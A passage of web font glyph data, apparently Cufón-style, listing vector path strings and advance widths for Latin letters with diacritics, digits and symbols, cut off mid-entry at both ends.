1,-7,-27r-44,0r0,-22r33,0r-66,-124r39,0r63,127r61,-127r37,0r-64,124r34,0r0,22r-46,0v-4,7,-7,15,-6,27r52,0r0,21r-52,0r0,63r-34,0"},{"d":"138,-96v-25,17,-94,1,-93,46v0,20,17,27,36,27v55,0,60,-27,57,-73xm188,-24r0,23v-18,9,-51,7,-48,-23v-31,41,-126,42,-127,-24v0,-42,31,-51,63,-57v34,-6,63,-4,63,-27v0,-48,-90,-40,-88,4r-31,0v2,-46,38,-62,79,-62v33,0,70,7,70,51r0,95v-1,19,4,24,19,20xm114,-213r0,-38r33,0r0,38r-33,0xm47,-213r0,-38r32,0r0,38r-32,0","w":193},{"d":"233,-257r0,164v0,65,-37,99,-101,99v-66,0,-105,-31,-105,-99r0,-164r34,0r0,164v0,45,26,70,71,70v101,0,58,-143,67,-234r34,0xm68,-278r0,-20r123,0r0,20r-123,0","w":259},{"d":"38,-164r0,-93r24,0r0,93r-24,0","w":100},{"d":"148,-53r-59,-71v-24,14,-45,27,-45,58v0,54,83,55,104,13xm192,0r-27,-32v-15,24,-45,36,-73,36v-69,0,-80,-49,-80,-70v0,-40,27,-61,60,-78v-14,-21,-28,-34,-28,-60v0,-28,21,-53,58,-53v32,0,62,18,62,53v0,31,-23,52,-48,66r46,57v5,-13,7,-26,8,-40r29,0v-3,30,-6,40,-17,63r50,58r-40,0xm99,-158v15,-9,34,-23,34,-45v0,-15,-11,-27,-29,-27v-14,0,-30,8,-30,27v0,15,14,31,25,45","w":226},{"d":"90,-255r0,154r-25,0r0,-111r-41,0r0,-18v23,0,44,-5,48,-25r18,0","w":119},{"d":"152,-59r30,0v-8,41,-38,63,-80,63v-59,0,-89,-41,-89,-98v0,-56,36,-96,87,-96v66,0,87,61,85,106r-140,0v-1,32,17,61,58,61v25,0,44,-12,49,-36xm45,-111r107,0v-1,-29,-23,-52,-53,-52v-32,0,-52,24,-54,52xm44,-206r37,-51r34,0r37,51r-29,0r-25,-34r-25,34r-29,0","w":193},{"d":"23,0r0,-186r29,0v1,9,-2,22,1,29v13,-23,33,-33,60,-33v94,-2,56,109,64,190r-30,0r0,-126v0,-23,-15,-37,-38,-37v-76,-1,-51,94,-55,163r-31,0xm77,-255v23,0,58,32,67,-1r19,0v-3,20,-13,42,-40,40v-12,0,-36,-14,-48,-14v-8,0,-18,6,-17,15r-19,0v6,-21,15,-40,38,-40"},{"d":"14,-129v0,-70,41,-134,123,-134v82,0,123,64,123,134v0,70,-41,135,-123,135v-82,0,-123,-65,-123,-135xm137,-234v-121,1,-120,210,0,211v120,-1,120,-210,0,-211xm194,-271r-32,0r-25,-25r-25,25r-33,0r39,-39r38,0","w":273},{"d":"152,-59r30,0v-8,41,-38,63,-80,63v-59,0,-89,-41,-89,-98v0,-56,36,-96,87,-96v66,0,87,61,85,106r-140,0v-1,32,17,61,58,61v25,0,44,-12,49,-36xm45,-111r107,0v-1,-29,-23,-52,-53,-52v-32,0,-52,24,-54,52xm116,-251r0,38r-32,0r0,-38r32,0","w":193},{"d":"14,-129v0,-70,41,-134,123,-134v82,0,123,64,123,134v0,70,-41,135,-123,135v-82,0,-123,-65,-123,-135xm137,-234v-121,1,-120,210,0,211v120,-1,120,-210,0,-211xm163,-271r-26,0r-41,-39r43,0","w":273},{"d":"13,-93v0,-55,31,-97,90,-97v59,0,91,42,91,97v0,54,-32,97,-91,97v-59,0,-90,-43,-90,-97xm45,-93v0,45,26,70,58,70v32,0,58,-25,58,-70v0,-45,-26,-70,-58,-70v-32,0,-58,25,-58,70xm84,-206r31,-51r39,0r-47,51r-23,0","w":206},{"d":"-3,0r101,-257r38,0r100,257r-38,0r-28,-77r-108,0r-29,77r-36,0xm117,-226v-17,38,-29,81,-45,120r87,0xm173,-271r-33,0r-24,-25r-26,25r-32,0r38,-39r39,0","w":233},{"d":"36,0r0,-159r-32,0r0,-27r32,0v-8,-53,19,-85,71,-71r0,27v-18,-6,-41,-5,-41,18r0,26r36,0r0,27r-36,0r0,159r-30,0","w":106},{"d":"177,-186r-81,211v-17,44,-35,58,-75,46r0,-28v17,8,36,6,43,-12r13,-32r-74,-185r34,0r56,152r52,-152r32,0","w":180},{"d":"17,-79r0,-24r182,0r0,24r-182,0xm85,-165v0,-13,11,-23,23,-23v12,0,23,11,23,23v0,12,-11,23,-23,23v-13,0,-23,-11,-23,-23xm85,-17v0,-13,11,-23,23,-23v12,0,23,11,23,23v0,12,-11,23,-23,23v-13,0,-23,-11,-23,-23","w":216},{"d":"28,0r0,-257r113,0v51,0,79,28,79,76v0,48,-28,76,-79,76r-79,0r0,105r-34,0xm62,-228r0,94v55,0,129,9,123,-47v6,-55,-68,-47,-123,-47","w":233},{"d":"28,0r0,-257r34,0r0,110r136,0r0,-110r34,0r0,257r-34,0r0,-118r-136,0r0,118r-34,0","w":259},{"d":"177,-186r-81,211v-17,44,-35,58,-75,46r0,-28v17,8,36,6,43,-12r13,-32r-74,-185r34,0r56,152r52,-152r32,0xm76,-206r31,-51r40,0r-48,51r-23,0","w":180},{"d":"13,-93v0,-68,83,-119,136,-69v-11,-25,-33,-46,-44,-54r-42,19r-13,-14r39,-19v-8,-6,-18,-13,-25,-17r25,-16v6,5,19,12,28,20r43,-20r12,13r-41,19v43,35,63,83,63,138v0,54,-32,97,-91,97v-59,0,-90,-43,-90,-97xm102,-155v-37,0,-57,25,-57,62v0,45,26,70,58,70v32,0,58,-25,58,-70v0,-33,-17,-62,-59,-62","w":206},{"d":"28,0r0,-257r34,0r0,128r131,-128r44,0r-108,104r112,153r-43,0r-93,-130r-43,40r0,90r-34,0","w":240},{"d":"62,-139v57,-4,130,17,131,-45v0,-25,-14,-44,-46,-44r-85,0r0,89xm198,0v-17,-27,9,-110,-52,-110r-84,0r0,110r-34,0r0,-257r121,0v86,-9,106,110,34,132v56,13,26,86,53,125r-38,0xm115,39r0,-25r29,0v1,30,0,52,-29,55r0,-11v12,-2,15,-10,15,-19r-15,0","w":246},{"d":"66,-242r0,56r37,0r0,27r-37,0r0,115v-4,19,18,17,37,17r0,27v-40,0,-68,3,-68,-41r0,-118r-32,0r0,-27r32,0r0,-56r31,0","w":113},{"d":"-3,0r101,-257r38,0r100,257r-38,0r-28,-77r-108,0r-29,77r-36,0xm117,-226v-17,38,-29,81,-45,120r87,0xm136,-271r0,-38r33,0r0,38r-33,0xm64,-271r0,-38r33,0r0,38r-33,0","w":233},{"d":"15,-125v0,-57,5,-130,85,-130v80,0,85,73,85,130v0,56,-5,129,-85,129v-80,0,-85,-73,-85,-129xm48,-126v0,38,0,103,52,103v52,0,53,-65,53,-103v0,-38,-1,-102,-53,-102v-52,0,-52,64,-52,102"},{"d":"30,0r0,-40r40,0r0,40r-40,0","w":100},{"d":"17,3r0,-25r153,-69r-153,-70r0,-24r182,83r0,22","w":216},{"d":"20,-203v0,-29,23,-52,52,-52v29,0,52,23,52,52v0,29,-23,51,-52,51v-29,0,-52,-22,-52,-51xm72,-237v-46,0,-44,67,0,67v21,0,34,-16,34,-33v0,-17,-13,-34,-34,-34","w":144},{"d":"138,-96v-25,17,-94,1,-93,46v0,20,17,27,36,27v55,0,60,-27,57,-73xm188,-24r0,23v-18,9,-51,7,-48,-23v-31,41,-126,42,-127,-24v0,-42,31,-51,63,-57v34,-6,63,-4,63,-27v0,-48,-90,-40,-88,4r-31,0v2,-46,38,-62,79,-62v33,0,70,7,70,51r0,95v-1,19,4,24,19,20xm80,-231v0,11,9,19,20,19v11,0,19,-8,19,-19v0,-11,-8,-20,-19,-20v-11,0,-20,9,-20,20xm67,-231v0,-18,15,-33,33,-33v18,0,32,15,32,33v0,18,-14,32,-32,32v-18,0,-33,-14,-33,-32","w":193},{"d":"233,-257r0,164v0,65,-37,99,-101,99v-66,0,-105,-31,-105,-99r0,-164r34,0r0,164v0,45,26,70,71,70v101,0,58,-143,67,-234r34,0","w":259},{"d":"0,-86r0,-28r360,0r0,28r-360,0","w":360},{"d":"8,0r0,-29r160,-199r-148,0r0,-29r188,0r0,29r-159,199r163,0r0,29r-204,0xm173,-310r-39,39r-38,0r-38,-39r32,0r25,25r25,-25r33,0","w":219},{"d":"159,-257r0,193v0,35,-18,70,-76,70v-54,0,-79,-33,-75,-91r34,0v-1,36,5,62,42,62v31,0,41,-18,41,-46r0,-188r34,0","w":186},{"d":"138,-96v-25,17,-94,1,-93,46v0,20,17,27,36,27v55,0,60,-27,57,-73xm188,-24r0,23v-18,9,-51,7,-48,-23v-31,41,-126,42,-127,-24v0,-42,31,-51,63,-57v34,-6,63,-4,63,-27v0,-48,-90,-40,-88,4r-31,0v2,-46,38,-62,79,-62v33,0,70,7,70,51r0,95v-1,19,4,24,19,20xm37,-223r0,-20r122,0r0,20r-122,0","w":193},{"d":"30,0r0,-257r34,0r0,257r-34,0","w":93},{"d":"14,-129v0,-70,41,-134,123,-134v82,0,123,64,123,134v0,70,-41,135,-123,135v-82,0,-123,-65,-123,-135xm137,-234v-121,1,-120,210,0,211v120,-1,120,-210,0,-211","w":273},{"d":"255,1r-17,21r-40,-31v-17,10,-37,15,-61,15v-82,0,-123,-65,-123,-135v0,-70,41,-134,123,-134v127,0,157,162,84,237xm144,-53r18,-20r34,27v53,-56,39,-188,-59,-188v-121,1,-120,210,0,211v13,0,24,-2,35,-7","w":273},{"d":"25,0r0,-257r30,0r0,257r-30,0xm26,39r0,-25r29,0v1,30,0,52,-29,55r0,-11v12,-2,15,-10,15,-19r-15,0","w":79},{"d":"130,-204r0,40r-40,0v-1,-44,-3,-92,39,-93r0,18v-16,0,-21,18,-21,35r22,0xm64,-204r0,40r-40,0v-1,-44,-3,-92,39,-93r0,18v-16,0,-21,18,-21,35r22,0","w":153},{"d":"152,-59r30,0v-8,41,-38,63,-80,63v-59,0,-89,-41,-89,-98v0,-56,36,-96,87,-96v66,0,87,61,85,106r-140,0v-1,32,17,61,58,61v25,0,44,-12,49,-36xm45,-111r107,0v-1,-29,-23,-52,-53,-52v-32,0,-52,24,-54,52xm81,-206r31,-51r40,0r-48,51r-23,0","w":193},{"d":"147,-170v0,-31,-18,-58,-52,-58v-36,0,-50,29,-50,60v0,28,20,54,50,54v32,0,52,-26,52,-56xm18,-62r30,0v2,25,23,39,47,39v36,0,59,-36,57,-99v-35,66,-140,31,-140,-50v0,-49,35,-83,84,-83v48,0,88,26,88,122v0,88,-27,137,-89,137v-43,0,-73,-22,-77,-66"},{"d":"199,-185r0,24r-153,70r153,69r0,25r-182,-83r0,-22","w":216},{"d":"98,-23r0,-140v-67,7,-67,134,0,140xm98,42r0,-38v-53,-2,-81,-42,-81,-95v0,-52,27,-95,81,-99r0,-35r14,0r0,35v39,1,68,20,73,64r-31,0v-5,-22,-19,-36,-42,-37r0,140v26,-3,40,-21,44,-45r30,0v-4,36,-29,72,-74,72r0,38r-14,0"},{"d":"233,-257r-99,152r0,105r-34,0r0,-105r-99,-152r40,0r77,122r76,-122r39,0xm101,-271r24,-39r43,0r-41,39r-26,0","w":233},{"d":"152,-59r30,0v-8,41,-38,63,-80,63v-59,0,-89,-41,-89,-98v0,-56,36,-96,87,-96v66,0,87,61,85,106r-140,0v-1,32,17,61,58,61v25,0,44,-12,49,-36xm45,-111r107,0v-1,-29,-23,-52,-53,-52v-32,0,-52,24,-54,52xm99,-206r-48,-51r40,0r31,51r-23,0","w":193},{"d":"111,-263r0,21v-51,-11,-35,54,-35,97v0,35,-24,45,-31,50v8,1,31,11,31,48v0,38,-21,105,35,97r0,21v-39,3,-64,-5,-64,-47v0,-42,6,-108,-30,-108r0,-24v36,0,30,-66,30,-108v0,-42,25,-50,64,-47","w":119},{"d":"62,-139v57,-4,130,17,131,-45v0,-25,-14,-44,-46,-44r-85,0r0,89xm198,0v-17,-27,9,-110,-52,-110r-84,0r0,110r-34,0r0,-257r121,0v86,-9,106,110,34,132v56,13,26,86,53,125r-38,0","w":246},{"d":"25,0r0,-186r30,0r0,186r-30,0xm55,-257r0,37r-30,0r0,-37r30,0","w":79},{"d":"233,-257r-99,152r0,105r-34,0r0,-105r-99,-152r40,0r77,122r76,-122r39,0xm136,-271r0,-38r33,0r0,38r-33,0xm64,-271r0,-38r33,0r0,38r-33,0","w":233},{"d":"-3,0r101,-257r38,0r100,257r-38,0r-28,-77r-108,0r-29,77r-36,0xm117,-226v-17,38,-29,81,-45,120r87,0xm62,-310r18,0v11,25,64,23,76,0r18,0v-3,23,-25,37,-57,37v-33,0,-52,-13,-55,-37","w":233},{"d":"64,-257v2,68,-4,130,-9,191r-16,0r-9,-112r0,-79r34,0xm27,0r0,-40r40,0r0,40r-40,0","w":93},{"d":"25,0r0,-143r-25,20r0,-26r25,-20r0,-88r30,0r0,64r26,-20r0,25r-26,21r0,167r-30,0","w":79},{"d":"90,-217r0,-40r40,0v1,44,2,92,-40,93r0,-18v16,0,21,-18,21,-35r-21,0xm24,-217r0,-40r40,0v1,44,2,92,-40,93r0,-18v16,0,21,-18,21,-35r-21,0","w":153},{"d":"30,0r0,-40r40,0r0,40r-40,0xm70,-186r0,40r-40,0r0,-40r40,0","w":100},{"d":"28,0r0,-257r169,0r0,29r-135,0r0,81r118,0r0,29r-118,0r0,118r-34,0","w":206},{"d":"28,0r0,-257r178,0r0,29r-144,0r0,81r134,0r0,29r-134,0r0,89r145,0r0,29r-179,0","w":219},{"d":"72,-257r0,41r39,-15r7,18r-39,13r24,33r-15,11r-25,-34r-23,34r-17,-11r24,-33r-38,-13r6,-18r38,15r0,-41r19,0","w":126},{"d":"120,-182r0,79r79,0r0,24r-79,0r0,79r-24,0r0,-79r-79,0r0,-24r79,0r0,-79r24,0","w":216},{"d":"329,-257r-69,257r-35,0r-60,-216r-59,216r-36,0r-66,-257r35,0r51,214r58,-214r37,0r58,214r52,-214r34,0","w":333},{"d":"177,-186r0,186r-29,0r0,-30v-13,23,-34,34,-61,34v-94,2,-56,-109,-64,-190r31,0r0,126v0,23,14,37,37,37v77,1,52,-93,56,-163r30,0xm55,-206r30,-51r37,0r-43,51r-24,0xm115,-206r29,-51r38,0r-43,51r-24,0"},{"d":"233,-257r0,164v0,65,-37,99,-101,99v-66,0,-105,-31,-105,-99r0,-164r34,0r0,164v0,45,26,70,71,70v101,0,58,-143,67,-234r34,0xm188,-271r-33,0r-25,-25r-25,25r-33,0r39,-39r38,0","w":259},{"d":"62,-118r0,89v57,-2,137,15,134,-46v-2,-60,-78,-39,-134,-43xm28,-257v83,3,192,-20,192,63v0,27,-15,48,-39,58v78,18,59,136,-29,136r-124,0r0,-257xm62,-228r0,81v51,-1,126,10,123,-41v-4,-60,-72,-34,-123,-40","w":246},{"d":"48,-140v10,47,121,19,121,86v0,44,-41,58,-79,58v-42,0,-77,-17,-79,-63r31,0v1,27,25,36,50,36v19,0,45,-4,45,-27v0,-50,-122,-19,-122,-88v0,-37,38,-52,70,-52v41,0,73,13,76,58r-31,0v-2,-24,-23,-31,-43,-31v-18,0,-39,4,-39,23xm78,39r0,-25r29,0v1,30,0,52,-29,55r0,-11v12,-2,15,-10,15,-19r-15,0","w":180},{"d":"25,0r0,-257r30,0r0,152r85,-81r41,0r-73,68r79,118r-39,0r-64,-97r-29,26r0,71r-30,0","w":186},{"d":"-3,0r101,-257r38,0r100,257r-38,0r-28,-77r-108,0r-29,77r-36,0xm117,-226v-17,38,-29,81,-45,120r87,0xm94,-271r24,-39r44,0r-41,39r-27,0","w":233},{"d":"28,0r0,-257r34,0r0,128r131,-128r44,0r-108,104r112,153r-43,0r-93,-130r-43,40r0,90r-34,0xm114,39r0,-25r29,0v1,30,0,52,-29,55r0,-11v12,-2,15,-10,15,-19r-15,0","w":240},{"d":"236,0v-19,3,-38,31,-37,39v-4,11,22,18,40,14r0,17v-28,3,-66,6,-66,-26v0,-10,5,-25,33,-44r-8,0r-28,-77r-108,0r-29,77r-36,0r101,-257r38,0xm117,-226v-17,38,-29,81,-45,120r87,0","w":233},{"d":"138,-96v-25,17,-94,1,-93,46v0,20,17,27,36,27v55,0,60,-27,57,-73xm188,-1v-15,3,-41,28,-40,40v-4,11,22,18,40,14r0,17v-28,3,-66,6,-66,-26v0,-9,5,-25,31,-43v-8,-4,-13,-11,-13,-25v-31,41,-126,42,-127,-24v0,-42,31,-51,63,-57v34,-6,63,-4,63,-27v0,-48,-90,-40,-88,4r-31,0v2,-46,38,-62,79,-62v33,0,70,7,70,51r0,95v-1,19,4,24,19,20r0,23","w":193},{"d":"138,-96v-25,17,-94,1,-93,46v0,20,17,27,36,27v55,0,60,-27,57,-73xm188,-24r0,23v-18,9,-51,7,-48,-23v-31,41,-126,42,-127,-24v0,-42,31,-51,63,-57v34,-6,63,-4,63,-27v0,-48,-90,-40,-88,4r-31,0v2,-46,38,-62,79,-62v33,0,70,7,70,51r0,95v-1,19,4,24,19,20xm101,-206r-47,-51r39,0r31,51r-23,0","w":193},{"d":"30,0r0,-257r34,0r0,257r-34,0xm63,-309r0,38r-32,0r0,-38r32,0","w":93},{"d":"9,0v-3,-104,134,-103,136,-182v0,-28,-22,-46,-49,-46v-36,0,-51,32,-50,63r-30,0v-3,-52,28,-90,82,-90v45,0,80,25,80,73v0,87,-118,89,-134,155r131,0r0,27r-166,0"},{"d":"177,-186r-81,211v-17,44,-35,58,-75,46r0,-28v17,8,36,6,43,-12r13,-32r-74,-185r34,0r56,152r52,-152r32,0xm108,-213r0,-38r32,0r0,38r-32,0xm40,-213r0,-38r32,0r0,38r-32,0","w":180},{"d":"48,-172r0,-18v20,1,38,-3,38,-23v0,-14,-12,-22,-28,-22v-19,0,-28,13,-28,31r-25,0v2,-31,21,-51,53,-51v50,0,73,57,28,72v18,7,31,19,31,38v0,32,-28,47,-58,47v-32,0,-58,-18,-58,-51r25,0v0,20,12,31,33,31v18,0,34,-10,34,-26v-1,-24,-21,-30,-45,-28","w":119},{"w":180},{"d":"0,71r0,-24r39,0r0,-286r-39,0r0,-24r67,0r0,334r-67,0","w":93},{"d":"-3,0r101,-257r38,0r100,257r-38,0r-28,-77r-108,0r-29,77r-36,0xm117,-226v-17,38,-29,81,-45,120r87,0","w":233},{"d":"128,-255r0,255r-30,0r0,-183r-67,0r0,-24v35,0,67,-9,74,-48r23,0"},{"d":"8,0r0,-29r160,-199r-148,0r0,-29r188,0r0,29r-159,199r163,0r0,29r-204,0","w":219},{"d":"86,0r0,-228r-85,0r0,-29r205,0r0,29r-85,0r0,228r-35,0xm161,-310r-38,39r-38,0r-39,-39r33,0r25,25r25,-25r32,0","w":206},{"d":"189,-257r0,257r-30,0v-1,-8,2,-19,-1,-25v-10,21,-33,29,-59,29v-57,0,-86,-45,-86,-98v0,-82,93,-130,146,-67r0,-96r30,0xm45,-91v0,35,18,68,58,68v41,0,57,-35,57,-70v0,-37,-17,-70,-59,-70v-42,0,-56,36,-56,72","w":213},{"d":"138,-96v-25,17,-94,1,-93,46v0,20,17,27,36,27v55,0,60,-27,57,-73xm188,-24r0,23v-18,9,-51,7,-48,-23v-31,41,-126,42,-127,-24v0,-42,31,-51,63,-57v34,-6,63,-4,63,-27v0,-48,-90,-40,-88,4r-31,0v2,-46,38,-62,79,-62v33,0,70,7,70,51r0,95v-1,19,4,24,19,20xm74,-255v23,0,58,31,67,-1r18,0v-3,20,-12,42,-39,40v-12,0,-36,-14,-48,-14v-8,0,-18,6,-17,15r-19,0v6,-21,15,-40,38,-40","w":193},{"d":"183,-251r0,26v-51,51,-93,145,-98,225r-34,0v6,-86,47,-165,101,-222r-134,0r0,-29r165,0"},{"d":"9,-129v0,-76,61,-134,135,-134v73,0,135,58,135,134v0,77,-62,135,-135,135v-74,0,-135,-58,-135,-135xm33,-129v0,66,48,115,111,115v62,0,111,-49,111,-115v0,-64,-49,-114,-111,-114v-63,0,-111,50,-111,114xm92,-50r0,-157v52,0,116,-8,116,45v0,28,-19,39,-42,42r45,70r-26,0r-43,-68r-26,0r0,68r-24,0xm116,-188r0,50v30,-2,68,9,67,-25v-1,-33,-37,-24,-67,-25","w":288},{"d":"78,-120r0,-26v33,5,61,-8,62,-41v0,-27,-19,-41,-45,-41v-33,0,-48,25,-48,55r-31,0v2,-49,28,-82,79,-82v44,0,78,21,78,68v1,23,-18,41,-35,52v31,7,46,31,46,62v0,51,-40,77,-88,77v-52,0,-86,-30,-85,-83r30,0v1,33,20,56,55,56v30,0,55,-18,55,-49v0,-39,-33,-54,-73,-48"},{"d":"186,-69v0,-73,-165,-28,-165,-119v0,-52,46,-75,93,-75v53,0,93,24,95,81r-32,0v-4,-37,-29,-52,-64,-52v-29,0,-58,11,-58,44v0,32,42,36,83,45v41,9,82,24,82,74v0,55,-53,77,-100,77v-58,0,-107,-28,-107,-91r33,0v0,43,36,62,75,62v31,0,65,-9,65,-46xm107,39r0,-25r29,0v1,30,0,52,-29,55r0,-11v12,-2,15,-10,15,-19r-15,0","w":233},{"d":"55,0r-30,0r0,-186r30,0r0,186xm58,-213r0,-38r32,0r0,38r-32,0xm-10,-213r0,-38r32,0r0,38r-32,0","w":79},{"d":"22,0r0,-186r29,0r0,39v15,-30,36,-44,69,-43r0,32v-81,-4,-66,83,-67,158r-31,0","w":119},{"d":"25,0r0,-257r30,0r0,257r-30,0xm23,-271r24,-39r39,0r-40,39r-23,0","w":79},{"d":"49,10r156,-271r23,0r-156,271r-23,0xm79,-255r0,154r-25,0r0,-111r-41,0r0,-18v23,0,44,-5,48,-25r18,0xm178,0v-4,-63,86,-62,87,-109v0,-15,-13,-26,-30,-26v-22,0,-30,17,-30,36r-24,0v0,-33,22,-55,55,-55v29,0,53,16,53,45v1,50,-76,56,-87,89r85,0r0,20r-109,0","w":300},{"d":"29,0r0,-257r47,0r81,216r81,-216r47,0r0,257r-33,0r0,-214r-81,214r-29,0r-81,-214r0,214r-32,0","w":313},{"d":"30,0r0,-40r40,0v2,47,0,82,-40,93r0,-18v16,-5,22,-23,21,-35r-21,0","w":100},{"d":"97,71r-24,0v-72,-101,-76,-232,0,-334r24,0v-66,106,-64,228,0,334","w":93},{"d":"28,0r0,-122r-25,0r0,-25r25,0r0,-110r88,0v79,0,124,39,124,122v0,86,-38,135,-124,135r-88,0xm62,-228r0,81r77,0r0,25r-77,0r0,93r57,0v23,0,87,-6,87,-101v0,-61,-23,-98,-86,-98r-58,0","w":253},{"d":"93,-263r0,24r-38,0r0,286r38,0r0,24r-67,0r0,-334r67,0","w":93},{"d":"20,-263r106,269r-26,0r-106,-269r26,0","w":119},{"d":"176,-191v0,62,-69,62,-62,128r-30,0v-9,-72,60,-70,60,-131v0,-26,-18,-42,-44,-42v-34,0,-50,26,-50,59r-30,0v-1,-49,30,-86,80,-86v44,0,76,26,76,72xm78,0r0,-40r40,0r0,40r-40,0"},{"d":"181,-126r-32,0v-5,-23,-21,-37,-46,-37v-44,0,-58,34,-58,72v0,34,16,68,55,68v30,0,47,-17,51,-45r31,0v-7,45,-35,72,-82,72v-57,0,-87,-40,-87,-95v0,-56,29,-99,88,-99v42,0,76,20,80,64","w":193},{"d":"70,-113v24,0,57,26,77,26v14,0,23,-15,31,-28r13,18v-11,15,-23,31,-45,31v-37,0,-91,-53,-108,2r-13,-18v8,-15,21,-31,45,-31","w":216},{"d":"58,-213r0,-38r32,0r0,38r-32,0xm-10,-213r0,-38r32,0r0,38r-32,0","w":79},{"d":"169,-251r0,27r-103,0r-13,74v50,-42,130,-9,130,69v0,43,-30,85,-89,85v-44,0,-80,-27,-81,-73r30,0v2,26,23,46,54,46v29,0,54,-19,54,-60v0,-58,-76,-77,-105,-34r-27,-1r24,-133r126,0"},{"d":"68,-151v-14,5,-26,18,-26,33v0,44,61,48,88,73v14,-6,26,-17,26,-33v0,-43,-60,-49,-88,-73xm138,14v-7,-54,-125,-58,-125,-131v0,-22,17,-44,38,-50v-38,-37,0,-96,50,-96v39,0,65,21,66,66r-30,0v0,-22,-14,-39,-37,-39v-19,0,-34,10,-34,31v0,50,120,58,120,123v0,23,-16,44,-38,52v44,33,16,101,-46,101v-42,0,-69,-26,-72,-68r30,0v-5,45,75,58,78,11"},{"d":"243,-180r-34,0v-7,-36,-36,-54,-72,-54v-61,0,-87,50,-87,104v0,59,25,107,87,107v45,0,71,-32,74,-74r35,0v-6,64,-47,103,-112,103v-80,0,-119,-59,-119,-134v0,-75,43,-135,122,-135v54,0,98,28,106,83xm193,-310r-39,39r-38,0r-38,-39r33,0r24,25r26,-25r32,0","w":259},{"d":"66,-242r0,56r37,0r0,27r-37,0r0,115v-4,19,18,17,37,17r0,27v-40,0,-68,3,-68,-41r0,-118r-32,0r0,-27r32,0r0,-56r31,0xm83,-229r0,-28r30,0v1,32,2,65,-29,65r0,-13v12,0,15,-12,15,-24r-16,0","w":113},{"d":"0,45r0,-18r180,0r0,18r-180,0","w":180},{"d":"28,6r0,-269r24,0r0,269r-24,0","w":79},{"d":"229,0r-9,-32v-20,27,-52,38,-82,38v-77,0,-123,-62,-123,-129v0,-75,42,-140,123,-140v56,0,100,25,110,85r-34,0v-7,-39,-38,-56,-76,-56v-62,0,-88,54,-88,109v0,54,31,102,88,102v53,0,84,-37,82,-84r-82,0r0,-28r113,0r0,135r-22,0","w":273},{"d":"168,-95v0,-35,-17,-68,-57,-68v-41,0,-57,35,-57,70v0,37,16,70,58,70v42,0,56,-36,56,-72xm55,-257r0,96v10,-21,34,-29,60,-29v57,0,86,44,86,97v0,53,-28,97,-85,97v-19,0,-47,-7,-61,-29r0,96r-31,0r0,-328r31,0","w":213},{"d":"138,-96v-25,17,-94,1,-93,46v0,20,17,27,36,27v55,0,60,-27,57,-73xm188,-24r0,23v-18,9,-51,7,-48,-23v-31,41,-126,42,-127,-24v0,-42,31,-51,63,-57v34,-6,63,-4,63,-27v0,-48,-90,-40,-88,4r-31,0v2,-46,38,-62,79,-62v33,0,70,7,70,51r0,95v-1,19,4,24,19,20xm79,-206r31,-51r39,0r-47,51r-23,0","w":193},{"d":"28,0r0,-257r34,0r0,228r136,0r0,29r-170,0"},{"d":"8,0r0,-23r112,-136r-105,0r0,-27r145,0r0,21r-114,138r119,0r0,27r-157,0","w":172},{"d":"62,-139v57,-4,130,17,131,-45v0,-25,-14,-44,-46,-44r-85,0r0,89xm198,0v-17,-27,9,-110,-52,-110r-84,0r0,110r-34,0r0,-257r121,0v86,-9,106,110,34,132v56,13,26,86,53,125r-38,0xm98,-271r24,-39r43,0r-40,39r-27,0","w":246},{"d":"98,-25v72,0,77,-137,2,-138v-39,0,-55,31,-55,67v0,33,13,71,53,71xm184,-186v-7,109,35,262,-87,262v-35,0,-75,-14,-77,-55r31,0v1,22,28,30,48,30v44,1,61,-37,55,-83v-10,23,-35,34,-58,34v-55,0,-83,-43,-83,-94v0,-44,22,-98,86,-98v24,-1,43,12,56,31r0,-27r29,0","w":206},{"d":"8,0r0,-29r160,-199r-148,0r0,-29r188,0r0,29r-159,199r163,0r0,29r-204,0xm132,-309r0,38r-33,0r0,-38r33,0","w":219},{"d":"8,0r0,-23r112,-136r-105,0r0,-27r145,0r0,21r-114,138r119,0r0,27r-157,0xm141,-257r-37,51r-33,0r-38,-51r30,0r24,35r26,-35r28,0","w":172},{"d":"30,0r0,-257r34,0r0,257r-34,0xm104,-271r-32,0r-25,-25r-25,25r-33,0r39,-39r38,0","w":93},{"d":"14,-129v0,-70,41,-134,123,-134v82,0,123,64,123,134v0,70,-41,135,-123,135v-82,0,-123,-65,-123,-135xm137,-234v-121,1,-120,210,0,211v120,-1,120,-210,0,-211xm157,-271r0,-38r32,0r0,38r-32,0xm85,-271r0,-38r32,0r0,38r-32,0","w":273},{"d":"9,-200r18,-17r20,20v27,-25,79,-25,106,-1r20,-20r18,19r-20,19v25,27,25,80,0,108r20,20r-17,17r-20,-21v-28,27,-81,26,-108,0r-20,21r-17,-17r20,-21v-25,-27,-26,-80,1,-106xm101,-189v-34,0,-60,28,-60,63v0,35,27,63,60,63v33,0,58,-28,58,-63v0,-34,-25,-63,-58,-63"},{"d":"69,-255v39,0,60,26,60,60v0,35,-21,58,-60,58v-38,0,-60,-24,-60,-58v0,-33,21,-60,60,-60xm105,-195v-2,-63,-72,-53,-72,0v0,22,10,40,36,40v26,0,36,-18,36,-40","w":138},{"d":"28,0r0,-257r178,0r0,29r-144,0r0,81r134,0r0,29r-134,0r0,89r145,0r0,29r-179,0xm59,-278r0,-20r123,0r0,20r-123,0","w":219},{"d":"151,-182v-34,0,-57,44,-57,75v0,20,13,35,31,35v31,0,55,-46,55,-76v0,-17,-14,-34,-29,-34xm222,-199r-34,120v0,6,3,11,9,11v22,0,50,-43,50,-82v0,-57,-48,-93,-98,-93v-62,0,-109,52,-109,115v0,107,141,153,200,71r23,0v-23,40,-67,63,-113,63v-76,0,-135,-60,-135,-136v0,-74,61,-133,134,-133v67,0,122,46,122,111v0,63,-50,104,-84,104v-13,0,-21,-9,-24,-23v-27,41,-96,25,-96,-33v0,-50,33,-102,84,-102v17,0,33,7,41,29r8,-22r22,0","w":288},{"d":"14,-129v0,-70,41,-134,123,-134v82,0,123,64,123,134v0,70,-41,135,-123,135v-82,0,-123,-65,-123,-135xm137,-234v-121,1,-120,210,0,211v120,-1,120,-210,0,-211xm153,-271r22,-39r40,0r-36,39r-26,0xm87,-271r22,-39r40,0r-36,39r-26,0","w":273},{"d":"62,0r-34,0r0,-257r34,0r0,41r79,0v51,0,79,28,79,76v0,48,-28,76,-79,76r-79,0r0,64xm62,-187r0,94v55,0,129,9,123,-47v6,-55,-68,-47,-123,-47","w":233},{"d":"8,0r0,-23r112,-136r-105,0r0,-27r145,0r0,21r-114,138r119,0r0,27r-157,0xm68,-206r31,-51r40,0r-48,51r-23,0","w":172},{"d":"103,-137v-34,0,-53,25,-53,57v0,32,20,57,53,57v33,0,51,-26,51,-56v0,-32,-16,-58,-51,-58xm180,-190r-31,0